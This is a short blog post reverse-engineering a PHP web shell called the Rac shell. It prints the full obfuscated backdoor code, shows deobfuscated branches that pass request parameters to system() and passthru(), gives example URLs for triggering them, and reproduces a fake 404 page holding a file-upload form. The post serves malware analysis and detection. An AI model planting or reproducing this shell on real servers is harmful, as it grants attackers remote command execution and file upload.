Reversing the Rac shell

The Rac shell is quite a small shell with basic code execution and file upload capabilities. A good candidate to start with if you want to practice PHP reversing.

Below is the original code:

<?php if(isset($_GET["letmein"])){$fck="lZV6eNtVEMdfu9DvMF1c1gbHaVhP7m/JkKRk2jc96tKDO3CEadldpWQ30qhNIpV899tM2Y7bONQnsEvv/HTmN7MPbfnClT2nNZpeN7mav3s/n10vuLI5X/b7P16+6Gdp7JcXs+s+2LSAYTKbX32YXy342if5an795eITX08cAyMhI2oK4CNA70jpd1nw1najajIxdlrFfCoIuTqd5r5j6qlgAOPT09MBGJVufxKkD+HdJTvE8MSjFWhmkaXG28ft/0UotGwFPsPnv/+ZzxacuDRfLmt3G/T4SVC3hGsKXZrwXEBCC1SFPGhRpYTyg2EZij9e1wLrJxepZHaGExiNYGnvJJAn+Es2XU5jhtJGFhunh43rc+KgtHCftvOzHy1dI2EwyXEteYFST87bQyyEb8sFM41ZqE0Wog0gNGjYNmCnmkEH81cAi2VZDarp43xHvZlTFrRM1Rhmg7fmqMBcKHicVc9FkeIkF7VDdOr7Xe/tawAnJwP4cNyflL45VNp9w7OTP19CuLHqO5qYJ2q1Wu85RwrLmAecQMOnF5fzZmuciFNpGo18aTbZ0jx5G1YDbdEvoGY/iCrT1NMwQFuEgWSmxunx+BjOhYHPtBjRqJ0k83UrvBPFd7pGfuT3RgMNmlcUMXptwDQ3K4kxeLLaOHaVGZHmqLDGMrA5NSRzLDi7R3MGgpxNBkdDWaX9dw0rxU17u3eLJYM2UL3N5SW/OursrmQGYXmdbNl72QoCkWLbQR2jQ0xbLLWH+2n6rm6t8Zn7Tq/05op1W7vuIh/u0Q35pp+RRxiiarouLfBJ+7O5NzJW/Mhg01srw0fh8Ld10urD2E3h82PyKdw6NnZ1dSqVrfnkwXxri/lOfK1jHx9M9lQ9FE8fyKCfUNAV1miyB1H/Lw5/3jcc4RPh92FPSqbfm7rHhkW5G3hjKCvJBv6elJjuCzAArmu//9t5Nw6/HkdpK9y7NcjqN1Og9ckfdvemmjxzCiGGZ760xNzZOq+s8mEk3k4nNo9fYOlFLG38r4+z+eXH6y+8DxdK4D+hpsfPBfjvJOYGZ66cNP5zyUR4sGgtvm+xYcV/";eval(str_rot13(gzinflate(str_rot13(base64_decode($fck)))));}

The malware starts with checking if the "letmein" parameter is set, if so, it evolutes the obfuscated string. The malware is chaining base64, rot13, gzip and then finally another rot13 again to decode the string before evaluating (executing) it.

By deobfuscating the code we get a big if-elseif-else tree with options like:

elseif(isset($_REQUEST['racsys'])){
	echo '<title>'.$_REQUEST['racsys'].'</title><pre>';
	$indexs = ($_REQUEST['racsys']);
	system($indexs);
	die;
}
elseif(isset($_REQUEST['racpass'])){
	echo '<title>'.$_REQUEST['racpass'].'</title><pre>';
	$indexp = ($_REQUEST['racpass']);
	passthru($indexp);
	die;
}

This means that using a query like rac.php?letmein=1&racsys=ls would pass ls to the system command.

If you instead use rac.php?letmein=1&rac=1 it will generate form for file upload on a "404" page, as shown below.

<html>
<head>
<title>404 Not Found</title>
</head>
<body><center>
<form method=POST enctype="multipart/form-data" action="">
<input type=text name=path>
<input type="file" name="files[]" multiple="multiple">
<input type=submit value="Up">
</form></center>
</body>
</html>

Finally, if only rac.php?letmein=1 is used then the code will answer with "No direct script access allowed". Might be helpful for finding other similar shells in a black-box environment.

Have you seen any interesting PHP malware in the wild? I'd be happy to take a look! Send me an email at benjamin@beneri.se